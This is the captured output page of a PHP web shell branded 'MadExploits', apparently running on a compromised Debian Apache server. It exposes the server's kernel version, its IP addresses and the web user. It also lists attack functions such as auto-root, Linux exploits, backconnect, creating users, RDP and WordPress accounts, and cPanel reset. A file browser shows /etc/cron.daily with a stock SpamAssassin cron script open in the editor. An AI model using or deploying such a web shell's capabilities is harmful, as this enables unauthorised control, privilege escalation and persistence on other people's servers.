Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.191.81.146
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
.placeholder
102
B
-rw-r--r--
00logwatch
268
B
-rwxr-xr-x
acct
379
B
-rwxr-xr-x
apache2
625
B
-rwxr-xr-x
apt
14.65
KB
-rwxr-xr-x
aptitude
314
B
-rwxr-xr-x
bsdmainutils
355
B
-rwxr-xr-x
dpkg
1.56
KB
-rwxr-xr-x
logrotate
89
B
-rwxr-xr-x
man-db
1.26
KB
-rwxr-xr-x
mlocate
435
B
-rwxr-xr-x
passwd
249
B
-rwxr-xr-x
spamassassin
2.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : spamassassin
#!/bin/sh # Duncan Findlay # duncf@debian.org # Daily cronjob for SpamAssassin updates. This isn't pretty but it # should do the job. CRON=0 test -f /etc/default/spamassassin && . /etc/default/spamassassin test -x /usr/bin/sa-update || exit 0 test -x /etc/init.d/spamassassin || exit 0 if [ "$CRON" = "0" ] ; then exit 0 fi # If there's a problem with the ruleset or configs, print the output # of spamassassin --lint (which will typically get emailed to root) # and abort. die_with_lint() { env -i LANG="$LANG" PATH="$PATH" start-stop-daemon \ --chuid debian-spamd:debian-spamd --start \ --exec /usr/bin/spamassassin -- -D --lint 2>&1 exit 1 } do_compile() { # Compile rules if the required tools are available. Prior to version # 3.3.2-8, there was an additional check to verify that an sa-compile # run had previously been executed by hand. With sa-learn now # distributed in a separate, optional, package, this check is no # longer necessary. if [ -x /usr/bin/re2c -a -x /usr/bin/sa-compile ]; then env -i LANG="$LANG" PATH="$PATH" start-stop-daemon \ --chuid debian-spamd:debian-spamd --start \ --exec /usr/bin/sa-compile -- --quiet # Fixup perms -- group and other should be able to # read and execute, but never write. Works around # sa-compile's failure to obey umask. chmod -R go-w,go+rX /var/lib/spamassassin/compiled fi } # Tell a running spamd to reload its configs and rules. reload() { # Reload if which invoke-rc.d >/dev/null 2>&1; then invoke-rc.d spamassassin reload > /dev/null else /etc/init.d/spamassassin reload > /dev/null fi if [ -d /etc/spamassassin/sa-update-hooks.d ]; then run-parts --lsbsysinit /etc/spamassassin/sa-update-hooks.d fi } # Sleep for up to 3600 seconds if not running interactively if [ ! -t 0 ]; then RANGE=3600 number=`od -vAn -N2 -tu4 < /dev/urandom` number=`expr $number "%" $RANGE` sleep $number fi # Update umask 022 env -i LANG="$LANG" PATH="$PATH" start-stop-daemon \ --chuid debian-spamd:debian-spamd --start \ --exec /usr/bin/sa-update -- \ --gpghomedir /var/lib/spamassassin/sa-update-keys 2>&1 case $? in 0) # got updates! env -i LANG="$LANG" PATH="$PATH" start-stop-daemon \ --chuid debian-spamd:debian-spamd --start \ --exec /usr/bin/spamassassin -- --lint 2>&1 || die_with_lint do_compile reload ;; 1) # no updates exit 0 ;; 2) # lint failed! die_with_lint ;; *) echo "sa-update failed for unknown reasons" 1>&2 ;; esac # Local variables: # mode: shell-script # tab-width: 4 # indent-tabs-mode: nil # end:
Close